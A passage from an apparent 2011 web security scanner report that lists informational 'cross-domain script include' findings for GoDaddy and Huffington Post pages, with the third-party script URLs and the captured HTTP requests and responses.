Content-Length: 204705


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">
<head id="ctl00_Head1"><li
...[SNIP]...
<body id="ctl00_PageBody" style="width:100%;margin:0;">
   
<script src="https://img3.wsimg.com/AtlantisScripts/jquery/jquery-1.3.2.min.js" type="text/javascript"></script>
...[SNIP]...
<!--HEADERBEGIN-->

<script type="text/javascript" language="javascript" src="https://img3.wsimg.com/pc/js/1/gd_js_20110426.min.js"></script>
...[SNIP]...
</div>
       

<script src="https://img3.wsimg.com/fastball/js_lib/FastballLibrary0006.js?version=1" type="text/javascript"></script>


<script src="https://img3.wsimg.com/fos/script/sales15.min.js" type="text/javascript"></script>
...[SNIP]...
</script>

<script src="https://img3.wsimg.com/fos/script/atlantis_jquery8.js" type="text/javascript"></script>
...[SNIP]...

17.110. https://www.godaddy.com/gdshop/hosting/landing.asp

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.godaddy.com
Path:   /gdshop/hosting/landing.asp

Issue detail

The response dynamically includes the following scripts from other domains:
  • https://imagesak.securepaynet.net/AtlantisScripts/jquery/jquery-1.3.1.min.js
  • https://imagesak.securepaynet.net/js/mocha/scripts/excanvas-compressed.js
  • https://imagesak.securepaynet.net/js/mocha/scripts/mocha-9a.5.js
  • https://imagesak.securepaynet.net/js/mocha/scripts/mootools-1.2-core.js
  • https://imagesak.securepaynet.net/js/mocha/scripts/mootools-1.2-more.js
  • https://img3.wsimg.com/pc/js/1/gd_js_20110426.min.js

Request

GET /gdshop/hosting/landing.asp HTTP/1.1
Host: www.godaddy.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Content-Length: 237966
Content-Type: text/html
Expires: Thu, 28 Apr 2011 12:17:23 GMT
Server: Microsoft-IIS/7.5
Set-Cookie: currency1=potableSourceStr=USD; expires=Fri, 04-May-2012 07:00:00 GMT; domain=.godaddy.com; path=/
Set-Cookie: adc1=US; expires=Thu, 12-May-2011 07:00:00 GMT; domain=.godaddy.com; path=/
Set-Cookie: traffic=referringdomain=&referringpath=&shopper=&querystring=&server=M1PWCORPWEB174&isc=&privatelabelid=1&page=%2Fgdshop%2Fhosting%2Flanding%2Easp&sitename=www%2Egodaddy%2Ecom&clientip=173%2E193%2E214%2E243&status=200+OK&referrer=&cookies=1; domain=.godaddy.com; path=/
Set-Cookie: serverVersion=A; domain=.godaddy.com; path=/
Set-Cookie: domainYardVal=%2D1; domain=.godaddy.com; path=/
Set-Cookie: ASPSESSIONIDQETSARRC=DJIOEHOABCHFDNEFOEEOKGOF; secure; path=/
X-Powered-By: ASP.NET
P3P: policyref="/w3c/p3p.xml", CP="COM CNT DEM FIN GOV INT NAV ONL PHY PRE PUR STA UNI IDC CAO OTI DSP COR CUR i OUR IND"
Date: Thu, 05 May 2011 10:57:22 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html>
<head>
<title>Web Hosting</title>
<meta http-equiv="Content-Type" con
...[SNIP]...
<body bgcolor="#FFFFFF" topmargin="0" leftmargin="0" marginheight="0" marginwidth="0" style="text-align:left; margin:0;">
<script src="https://imagesak.securepaynet.net/AtlantisScripts/jquery/jquery-1.3.1.min.js" type="text/javascript"></script>
...[SNIP]...
<!-- BEGIN HEADER -->
<script type="text/javascript" language="javascript" src="https://img3.wsimg.com/pc/js/1/gd_js_20110426.min.js"></script>
...[SNIP]...
<link rel="stylesheet" href="https://imagesak.securepaynet.net/js/mocha/css/ui.css" type="text/css" />
<script type="text/javascript" src="https://imagesak.securepaynet.net/js/mocha/scripts/mootools-1.2-core.js"></script>
<script type="text/javascript" src="https://imagesak.securepaynet.net/js/mocha/scripts/mootools-1.2-more.js"></script>
<script type="text/javascript" src="https://imagesak.securepaynet.net/js/mocha/scripts/excanvas-compressed.js"></script>
<script type="text/javascript" src="https://imagesak.securepaynet.net/js/mocha/scripts/mocha-9a.5.js" charset="utf-8"></script>
...[SNIP]...

17.111. http://www.huffingtonpost.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.huffingtonpost.com
Path:   /

Issue detail

The response dynamically includes the following scripts from other domains:
  • http://ads.pubmatic.com/AdServer/js/universalpixel.js
  • http://o.aolcdn.com/ads/adsWrapper.js
  • http://pixel.quantserve.com/seg/p-6fTutip1SMLM2.js
  • http://s.huffpost.com/assets/js.php?f=huff.js%2Chp_config.js%2Chp_app.js%2Chp_plugins_default.js%2Chp_plugins_default_yui.js%2Chp_init.js%2Cjquery%2Fjquery.backgroundPosition.js%2Cflashobjectmin.js%2Cjsonmin.js%2Ccookiesmin.js%2Cv%2Fblogroll.js%2Chp_track.js%2Chp_util.js%2Cjquery%2Fcolor.jquery.js%2Chp_browser.js%2Ccommon.js%2Clightboxes.js%2Cjquery%2Fjquery.jdMenu.js%2Cprovider.js%2Cquickview.js%2Cshare.js%2Cposts.js%2Crefresh.js%2Cmost_popular.js%2Cfacebook.js%2Cgeopromo.js%2Csnproject.js%2Clazyload-min.js%2Csnn_module.js%2Cuser.js%2Chp_message.js%2Cbalance_columns.js%2Csocial_friends.js%2Cuser%2Frecommendations.js%2Csitemode.js%2Cmobile%2Fiphone.js%2Cmobile%2Fandroid.js%2Csplash_slideshow.js%2Cmodal_window.js%2Cpopup_manager.js%2Cbadges_v2.js%2Cuser_levels.js%2Ctwitter_splash.js%2Csharer.js%2Chuffconnect.js%2Cconnect_overview.js%2Cbing.js%2Chptwitter_anywhere.js%2Ctwitter%2Ffrontpage.js%2Chptwitter.js%2Capp-feeds.js&v47007
  • http://s.huffpost.com/assets/js.php?f=v.js&v47014
  • http://s.huffpost.com/assets/js.php?f=yui.js%2Cjquery.js

Request

GET /?icid=navbar_huffpo_main5 HTTP/1.1
Host: www.huffingtonpost.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: Apache/2.2.8 (Unix)
Content-Type: text/html; charset=utf-8
Vary: Accept-Encoding
Cache-Control: max-age=6
Date: Thu, 05 May 2011 00:58:42 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 268850

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" xmln
...[SNIP]...
<link rel="alternate" type="application/rss+xml" title="Wire Services" href="http://www.huffingtonpost.com/wires/full_index.rdf" />
       <script type="text/javascript" src="http://s.huffpost.com/assets/js.php?f=yui.js%2Cjquery.js" ></script>

       <script type="text/javascript" src="http://s.huffpost.com/assets/js.php?f=huff.js%2Chp_config.js%2Chp_app.js%2Chp_plugins_default.js%2Chp_plugins_default_yui.js%2Chp_init.js%2Cjquery%2Fjquery.backgroundPosition.js%2Cflashobjectmin.js%2Cjsonmin.js%2Ccookiesmin.js%2Cv%2Fblogroll.js%2Chp_track.js%2Chp_util.js%2Cjquery%2Fcolor.jquery.js%2Chp_browser.js%2Ccommon.js%2Clightboxes.js%2Cjquery%2Fjquery.jdMenu.js%2Cprovider.js%2Cquickview.js%2Cshare.js%2Cposts.js%2Crefresh.js%2Cmost_popular.js%2Cfacebook.js%2Cgeopromo.js%2Csnproject.js%2Clazyload-min.js%2Csnn_module.js%2Cuser.js%2Chp_message.js%2Cbalance_columns.js%2Csocial_friends.js%2Cuser%2Frecommendations.js%2Csitemode.js%2Cmobile%2Fiphone.js%2Cmobile%2Fandroid.js%2Csplash_slideshow.js%2Cmodal_window.js%2Cpopup_manager.js%2Cbadges_v2.js%2Cuser_levels.js%2Ctwitter_splash.js%2Csharer.js%2Chuffconnect.js%2Cconnect_overview.js%2Cbing.js%2Chptwitter_anywhere.js%2Ctwitter%2Ffrontpage.js%2Chptwitter.js%2Capp-feeds.js&amp;v47007"></script>
...[SNIP]...
</script>
   <script type="text/javascript" src="http://s.huffpost.com/assets/js.php?f=v.js&amp;v47014"></script>

<!-- core ad call for AOL AdTech -->
<script type="text/javascript" src="http://o.aolcdn.com/ads/adsWrapper.js"></script>
...[SNIP]...
</noscript>

<script type="text/javascript" src="http://pixel.quantserve.com/seg/p-6fTutip1SMLM2.js"></script>
...[SNIP]...
</script>

<script src='http://ads.pubmatic.com/AdServer/js/universalpixel.js' type='text/javascript'></script>
...[SNIP]...

17.112. http://www.huffingtonpost.com/2011/05/02/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.huffingtonpost.com
Path:   /2011/05/02/

Issue detail

The response dynamically includes the following scripts from other domains:
  • http://ads.pubmatic.com/AdServer/js/universalpixel.js
  • http://o.aolcdn.com/ads/adsWrapper.js
  • http://pixel.quantserve.com/seg/p-6fTutip1SMLM2.js
  • http://s.huffpost.com/assets/js.php?f=huff.js%2Chp_config.js%2Chp_app.js%2Chp_plugins_default.js%2Chp_plugins_default_yui.js%2Chp_init.js%2Cjquery%2Fjquery.backgroundPosition.js%2Cflashobjectmin.js%2Cjsonmin.js%2Ccookiesmin.js%2Cv%2Fblogroll.js%2Chp_track.js%2Chp_util.js%2Cjquery%2Fcolor.jquery.js%2Chp_browser.js%2Ccommon.js%2Clightboxes.js%2Cjquery%2Fjquery.jdMenu.js%2Cprovider.js%2Cquickview.js%2Cshare.js%2Cposts.js%2Crefresh.js%2Cmost_popular.js%2Cfacebook.js%2Cgeopromo.js%2Csnproject.js%2Clazyload-min.js%2Csnn_module.js%2Cuser.js%2Chp_message.js%2Cbalance_columns.js%2Csocial_friends.js%2Cuser%2Frecommendations.js%2Csitemode.js%2Cmobile%2Fiphone.js%2Cmobile%2Fandroid.js%2Csplash_slideshow.js%2Cmodal_window.js%2Cpopup_manager.js%2Cbadges_v2.js%2Cuser_levels.js%2Ctwitter_splash.js%2Csharer.js%2Chuffconnect.js%2Cconnect_overview.js%2Cbing.js%2Chptwitter_anywhere.js%2Ctwitter%2Ffrontpage.js%2Chptwitter.js%2Capp-feeds.js&v47007
  • http://s.huffpost.com/assets/js.php?f=v.js&v47053
  • http://s.huffpost.com/assets/js.php?f=val.js
  • http://s.huffpost.com/assets/js.php?f=yui.js%2Cjquery.js

Request

GET /2011/05/02/ HTTP/1.1
Host: www.huffingtonpost.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=265287574.|3=User=A=1,4=JoinedOn=0=1,; huffpost_influence_null=%7B%22commented%22%3A%7B%22value%22%3A0%2C%22check_date%22%3A1304575102000%7D%2C%22blogged%22%3A%7B%22value%22%3A0%2C%22check_date%22%3A1304575102000%7D%2C%22shared%22%3A%7B%22value%22%3A0%2C%22check_date%22%3A1304575102000%7D%2C%22emailed%22%3A%7B%22value%22%3A0%2C%22check_date%22%3A1304575102000%7D%2C%22bages%22%3Anull%7D; CUNAUTHID=1.f49ac58470c911e0ba8373d1f2b58312.0903; __utmz=265287574.1304575105.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; UNAUTHID=1.f49ac58470c911e0ba8373d1f2b58312.0903; geocity=Dallas; huffpo_type_views=%7B%2215%22%3A1%7D; is_aol_user=1; s_pers=%20s_getnr%3D1304578722710-Repeat%7C1367650722710%3B%20s_nrgvo%3DRepeat%7C1367650722712%3B; huffpost_adssale=n; __utma=265287574.457433518.1304575105.1304575105.1304578723.2; geostate=Texas; __utmc=265287574; __utmb=265287574.3.10.1304578723; __qca=P0-822287727-1304575116403; __qseg=Q_D|Q_T|Q_2689|Q_2687|Q_2685|Q_1908|Q_1905|Q_1592|Q_683|Q_680|Q_679|Q_678|Q_666|Q_665|Q_657;

Response

HTTP/1.1 200 OK
Server: Apache/2.2.8 (Unix)
Content-Length: 123034
Content-Type: text/html; charset=utf-8
Cache-Control: max-age=164
Date: Thu, 05 May 2011 10:58:24 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" xmln
...[SNIP]...
<link rel="alternate" type="application/rss+xml" title="Wire Services" href="http://www.huffingtonpost.com/wires/full_index.rdf" />
       <script type="text/javascript" src="http://s.huffpost.com/assets/js.php?f=yui.js%2Cjquery.js" ></script>

       <script type="text/javascript" src="http://s.huffpost.com/assets/js.php?f=huff.js%2Chp_config.js%2Chp_app.js%2Chp_plugins_default.js%2Chp_plugins_default_yui.js%2Chp_init.js%2Cjquery%2Fjquery.backgroundPosition.js%2Cflashobjectmin.js%2Cjsonmin.js%2Ccookiesmin.js%2Cv%2Fblogroll.js%2Chp_track.js%2Chp_util.js%2Cjquery%2Fcolor.jquery.js%2Chp_browser.js%2Ccommon.js%2Clightboxes.js%2Cjquery%2Fjquery.jdMenu.js%2Cprovider.js%2Cquickview.js%2Cshare.js%2Cposts.js%2Crefresh.js%2Cmost_popular.js%2Cfacebook.js%2Cgeopromo.js%2Csnproject.js%2Clazyload-min.js%2Csnn_module.js%2Cuser.js%2Chp_message.js%2Cbalance_columns.js%2Csocial_friends.js%2Cuser%2Frecommendations.js%2Csitemode.js%2Cmobile%2Fiphone.js%2Cmobile%2Fandroid.js%2Csplash_slideshow.js%2Cmodal_window.js%2Cpopup_manager.js%2Cbadges_v2.js%2Cuser_levels.js%2Ctwitter_splash.js%2Csharer.js%2Chuffconnect.js%2Cconnect_overview.js%2Cbing.js%2Chptwitter_anywhere.js%2Ctwitter%2Ffrontpage.js%2Chptwitter.js%2Capp-feeds.js&amp;v47007"></script>
...[SNIP]...
</script>
   <script type="text/javascript" src="http://s.huffpost.com/assets/js.php?f=v.js&amp;v47053"></script>

<!-- core ad call for AOL AdTech -->
<script type="text/javascript" src="http://o.aolcdn.com/ads/adsWrapper.js"></script>
...[SNIP]...
</script>
       <script type="text/javascript" src="http://s.huffpost.com/assets/js.php?f=val.js"></script>
...[SNIP]...
</noscript>

<script type="text/javascript" src="http://pixel.quantserve.com/seg/p-6fTutip1SMLM2.js"></script>
...[SNIP]...
</script>

<script src='http://ads.pubmatic.com/AdServer/js/universalpixel.js' type='text/javascript'></script>
...[SNIP]...

17.113. http://www.huffingtonpost.com/2011/05/02/holocaust-memorial-day_n_856638.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.huffingtonpost.com
Path:   /2011/05/02/holocaust-memorial-day_n_856638.html

Issue detail

The response dynamically includes the following scripts from other domains:
  • http://ads.pubmatic.com/AdServer/js/universalpixel.js
  • http://o.aolcdn.com/ads/adsWrapper.js
  • http://pixel.quantserve.com/seg/p-6fTutip1SMLM2.js
  • http://s.huffpost.com/assets/js.php?f=hp_scrollbar.js&extra3
  • http://s.huffpost.com/assets/js.php?f=huff.js%2Chp_config.js%2Chp_app.js%2Chp_plugins_default.js%2Chp_plugins_default_yui.js%2Chp_init.js%2Cjquery%2Fjquery.backgroundPosition.js%2Ccookiesmin.js%2Cjsonmin.js%2Chp_track.js%2Chp_util.js%2Chp_browser.js%2Ccommon.js%2Clightboxes.js%2Cprovider.js%2Cposts.js%2Cshare.js%2Cquickview.js%2Cjquery%2Fjquery.jdMenu.js%2Cjquery%2Fcolor.jquery.js%2Cflashobjectmin.js%2Clazyload-min.js%2Cfacebook.js%2Csnproject.js%2Csnn_module.js%2Cuser.js%2Chp_message.js%2Csocial_friends.js%2Cuser%2Frecommendations.js%2Csubmissions.js%2Cmodules%2Fhpimagecrop.js%2Cmobile%2Fiphone.js%2Cmobile%2Fandroid.js%2Cjquery%2Fjquery.inview.min.js%2Cmodal_window.js%2Cpopup_manager.js%2Cbadges_v2.js%2Csharer.js%2Cuser_levels.js%2Cpopup.js%2Chuffconnect.js%2Cconnect_overview.js%2Cbing.js%2Chptwitter_anywhere.js%2Chptwitter.js%2Capp-feeds.js%2Csitemode.js%2Cslideshow%2Fpollajax.js&v47007
  • http://s.huffpost.com/assets/js.php?f=modules%2Fcomments.js&v46884
  • http://s.huffpost.com/assets/js.php?f=twitter_clientside.js
  • http://s.huffpost.com/assets/js.php?f=v.js&v47014
  • http://s.huffpost.com/assets/js.php?f=yui.js%2Cjquery.js

Request

GET /2011/05/02/holocaust-memorial-day_n_856638.html HTTP/1.1
Host: www.huffingtonpost.com
Proxy-Connection: keep-alive
Referer: http://www.huffingtonpost.com/2011/05/04/osama-bin-laden-pictures_n_857568.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: huffpost_influence_null=%7B%22commented%22%3A%7B%22value%22%3A0%2C%22check_date%22%3A1304575102000%7D%2C%22blogged%22%3A%7B%22value%22%3A0%2C%22check_date%22%3A1304575102000%7D%2C%22shared%22%3A%7B%22value%22%3A0%2C%22check_date%22%3A1304575102000%7D%2C%22emailed%22%3A%7B%22value%22%3A0%2C%22check_date%22%3A1304575102000%7D%2C%22bages%22%3Anull%7D; __utmz=265287574.1304575105.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __qca=P0-822287727-1304575116403; is_aol_user=1; huffpost_adssale=n; UNAUTHID=1.f49ac58470c911e0ba8373d1f2b58312.0903; CUNAUTHID=1.f49ac58470c911e0ba8373d1f2b58312.0903; huffpo_type_views=%7B%2215%22%3A1%7D; __qseg=Q_D|Q_T|Q_2689|Q_2687|Q_2685|Q_1908|Q_1905|Q_1592|Q_683|Q_680|Q_679|Q_678|Q_666|Q_665|Q_657; __utma=265287574.457433518.1304575105.1304575105.1304575105.1; __utmc=265287574; __utmv=265287574.|3=User=A=1,4=JoinedOn=0=1,; __utmb=265287574.14.9.1304575182212; s_pers=%20s_getnr%3D1304575182214-New%7C1367647182214%3B%20s_nrgvo%3DNew%7C1367647182216%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3Daolhuffpo%252Caolsvc%253D%252526pid%25253Dhpo%25252520%2525253A%25252520Osama%25252520Bin%25252520Laden%25252520Pictures%25252520Will%25252520Not%25252520Be%25252520Released%2525252C%25252520Obama%25252520Decides%25252520%25252528UPDATED%25252529%252526pidt%25253D1%252526oid%25253Dhttp%2525253A//www.huffingtonpost.com/2011/05/02/holocaust-memorial-day_n_856638.html%252526ot%25253DA%3B

Response

HTTP/1.1 200 OK
Server: Apache/2.2.8 (Unix)
Content-Type: text/html; charset=utf-8
Vary: Accept-Encoding
Expires: Thu, 05 May 2011 01:00:40 GMT
Cache-Control: max-age=0, no-cache
Pragma: no-cache
Date: Thu, 05 May 2011 01:00:40 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 469486

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" xmlns
...[SNIP]...
<!-- core ad call for AOL AdTech -->
<script type="text/javascript" src="http://o.aolcdn.com/ads/adsWrapper.js"></script>
...[SNIP]...
<link rel="stylesheet" href="http://s.huffpost.com/assets/css.php?f=print-view.css" type="text/css" media="print" />
   
               
   <script type="text/javascript" src="http://s.huffpost.com/assets/js.php?f=yui.js%2Cjquery.js" ></script>

       <script type="text/javascript" src="http://s.huffpost.com/assets/js.php?f=huff.js%2Chp_config.js%2Chp_app.js%2Chp_plugins_default.js%2Chp_plugins_default_yui.js%2Chp_init.js%2Cjquery%2Fjquery.backgroundPosition.js%2Ccookiesmin.js%2Cjsonmin.js%2Chp_track.js%2Chp_util.js%2Chp_browser.js%2Ccommon.js%2Clightboxes.js%2Cprovider.js%2Cposts.js%2Cshare.js%2Cquickview.js%2Cjquery%2Fjquery.jdMenu.js%2Cjquery%2Fcolor.jquery.js%2Cflashobjectmin.js%2Clazyload-min.js%2Cfacebook.js%2Csnproject.js%2Csnn_module.js%2Cuser.js%2Chp_message.js%2Csocial_friends.js%2Cuser%2Frecommendations.js%2Csubmissions.js%2Cmodules%2Fhpimagecrop.js%2Cmobile%2Fiphone.js%2Cmobile%2Fandroid.js%2Cjquery%2Fjquery.inview.min.js%2Cmodal_window.js%2Cpopup_manager.js%2Cbadges_v2.js%2Csharer.js%2Cuser_levels.js%2Cpopup.js%2Chuffconnect.js%2Cconnect_overview.js%2Cbing.js%2Chptwitter_anywhere.js%2Chptwitter.js%2Capp-feeds.js%2Csitemode.js%2Cslideshow%2Fpollajax.js&amp;v47007"></script>
...[SNIP]...
</script>
   <script type="text/javascript" src="http://s.huffpost.com/assets/js.php?f=v.js&amp;v47014"></script>
...[SNIP]...
<link rel="stylesheet" href="http://s.huffpost.com/assets/css.php?f=hp_scrollbar.css" type="text/css" media="screen" />
   <script type="text/javascript" src="http://s.huffpost.com/assets/js.php?f=hp_scrollbar.js&amp;extra3"></script>
...[SNIP]...
</div>


<script type="text/javascript" src="http://s.huffpost.com/assets/js.php?f=twitter_clientside.js"></script>
...[SNIP]...
<!-- CommentsV3 -->
<script type="text/javascript" src="http://s.huffpost.com/assets/js.php?f=modules%2Fcomments.js&amp;v46884"></script>
...[SNIP]...
</noscript>

<script type="text/javascript" src="http://pixel.quantserve.com/seg/p-6fTutip1SMLM2.js"></script>
...[SNIP]...
</script>

<script src='http://ads.pubmatic.com/AdServer/js/universalpixel.js' type='text/javascript'></script>
...[SNIP]...

17.114. http://www.huffingtonpost.com/2011/05/04/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.huffingtonpost.com
Path:   /2011/05/04/

Issue detail

The response dynamically includes the following scripts from other domains:
  • http://ads.pubmatic.com/AdServer/js/universalpixel.js
  • http://o.aolcdn.com/ads/adsWrapper.js
  • http://pixel.quantserve.com/seg/p-6fTutip1SMLM2.js
  • http://s.huffpost.com/assets/js.php?f=huff.js%2Chp_config.js%2Chp_app.js%2Chp_plugins_default.js%2Chp_plugins_default_yui.js%2Chp_init.js%2Cjquery%2Fjquery.backgroundPosition.js%2Cflashobjectmin.js%2Cjsonmin.js%2Ccookiesmin.js%2Cv%2Fblogroll.js%2Chp_track.js%2Chp_util.js%2Cjquery%2Fcolor.jquery.js%2Chp_browser.js%2Ccommon.js%2Clightboxes.js%2Cjquery%2Fjquery.jdMenu.js%2Cprovider.js%2Cquickview.js%2Cshare.js%2Cposts.js%2Crefresh.js%2Cmost_popular.js%2Cfacebook.js%2Cgeopromo.js%2Csnproject.js%2Clazyload-min.js%2Csnn_module.js%2Cuser.js%2Chp_message.js%2Cbalance_columns.js%2Csocial_friends.js%2Cuser%2Frecommendations.js%2Csitemode.js%2Cmobile%2Fiphone.js%2Cmobile%2Fandroid.js%2Csplash_slideshow.js%2Cmodal_window.js%2Cpopup_manager.js%2Cbadges_v2.js%2Cuser_levels.js%2Ctwitter_splash.js%2Csharer.js%2Chuffconnect.js%2Cconnect_overview.js%2Cbing.js%2Chptwitter_anywhere.js%2Ctwitter%2Ffrontpage.js%2Chptwitter.js%2Capp-feeds.js&v47007
  • http://s.huffpost.com/assets/js.php?f=v.js&v47053
  • http://s.huffpost.com/assets/js.php?f=val.js
  • http://s.huffpost.com/assets/js.php?f=yui.js%2Cjquery.js

Request

GET /2011/05/04/ HTTP/1.1
Host: www.huffingtonpost.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=265287574.|3=User=A=1,4=JoinedOn=0=1,; huffpost_influence_null=%7B%22commented%22%3A%7B%22value%22%3A0%2C%22check_date%22%3A1304575102000%7D%2C%22blogged%22%3A%7B%22value%22%3A0%2C%22check_date%22%3A1304575102000%7D%2C%22shared%22%3A%7B%22value%22%3A0%2C%22check_date%22%3A1304575102000%7D%2C%22emailed%22%3A%7B%22value%22%3A0%2C%22check_date%22%3A1304575102000%7D%2C%22bages%22%3Anull%7D; CUNAUTHID=1.f49ac58470c911e0ba8373d1f2b58312.0903; __utmz=265287574.1304575105.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; UNAUTHID=1.f49ac58470c911e0ba8373d1f2b58312.0903; geocity=Dallas; huffpo_type_views=%7B%2215%22%3A1%7D; is_aol_user=1; s_pers=%20s_getnr%3D1304578722710-Repeat%7C1367650722710%3B%20s_nrgvo%3DRepeat%7C1367650722712%3B; huffpost_adssale=n; __utma=265287574.457433518.1304575105.1304575105.1304578723.2; geostate=Texas; __utmc=265287574; __utmb=265287574.3.10.1304578723; __qca=P0-822287727-1304575116403; __qseg=Q_D|Q_T|Q_2689|Q_2687|Q_2685|Q_1908|Q_1905|Q_1592|Q_683|Q_680|Q_679|Q_678|Q_666|Q_665|Q_657;

Response

HTTP/1.1 200 OK
Server: Apache/2.2.8 (Unix)
Content-Length: 140601
Content-Type: text/html; charset=utf-8
Cache-Control: max-age=300
Date: Thu, 05 May 2011 10:58:25 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" xmln
...[SNIP]...
<link rel="alternate" type="application/rss+xml" title="Wire Services" href="http://www.huffingtonpost.com/wires/full_index.rdf" />
       <script type="text/javascript" src="http://s.huffpost.com/assets/js.php?f=yui.js%2Cjquery.js" ></script>

       <script type="text/javascript" src="http://s.huffpost.com/assets/js.php?f=huff.js%2Chp_config.js%2Chp_app.js%2Chp_plugins_default.js%2Chp_plugins_default_yui.js%2Chp_init.js%2Cjquery%2Fjquery.backgroundPosition.js%2Cflashobjectmin.js%2Cjsonmin.js%2Ccookiesmin.js%2Cv%2Fblogroll.js%2Chp_track.js%2Chp_util.js%2Cjquery%2Fcolor.jquery.js%2Chp_browser.js%2Ccommon.js%2Clightboxes.js%2Cjquery%2Fjquery.jdMenu.js%2Cprovider.js%2Cquickview.js%2Cshare.js%2Cposts.js%2Crefresh.js%2Cmost_popular.js%2Cfacebook.js%2Cgeopromo.js%2Csnproject.js%2Clazyload-min.js%2Csnn_module.js%2Cuser.js%2Chp_message.js%2Cbalance_columns.js%2Csocial_friends.js%2Cuser%2Frecommendations.js%2Csitemode.js%2Cmobile%2Fiphone.js%2Cmobile%2Fandroid.js%2Csplash_slideshow.js%2Cmodal_window.js%2Cpopup_manager.js%2Cbadges_v2.js%2Cuser_levels.js%2Ctwitter_splash.js%2Csharer.js%2Chuffconnect.js%2Cconnect_overview.js%2Cbing.js%2Chptwitter_anywhere.js%2Ctwitter%2Ffrontpage.js%2Chptwitter.js%2Capp-feeds.js&amp;v47007"></script>
...[SNIP]...
</script>
   <script type="text/javascript" src="http://s.huffpost.com/assets/js.php?f=v.js&amp;v47053"></script>

<!-- core ad call for AOL AdTech -->
<script type="text/javascript" src="http://o.aolcdn.com/ads/adsWrapper.js"></script>
...[SNIP]...
</script>
       <script type="text/javascript" src="http://s.huffpost.com/assets/js.php?f=val.js"></script>
...[SNIP]...
</noscript>

<script type="text/javascript" src="http://pixel.quantserve.com/seg/p-6fTutip1SMLM2.js"></script>
...[SNIP]...
</script>

<script src='http://ads.pubmatic.com/AdServer/js/universalpixel.js' type='text/javascript'></script>
...[SNIP]...

17.115. http://www.huffingtonpost.com/2011/05/04/cnn-poll-finds-that-most-_n_857597.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.huffingtonpost.com
Path:   /2011/05/04/cnn-poll-finds-that-most-_n_857597.html

Issue detail

The response dynamically includes the following scripts from other domains:
  • http://ads.pubmatic.com/AdServer/js/universalpixel.js
  • http://o.aolcdn.com/ads/adsWrapper.js
  • http://pixel.quantserve.com/seg/p-6fTutip1SMLM2.js
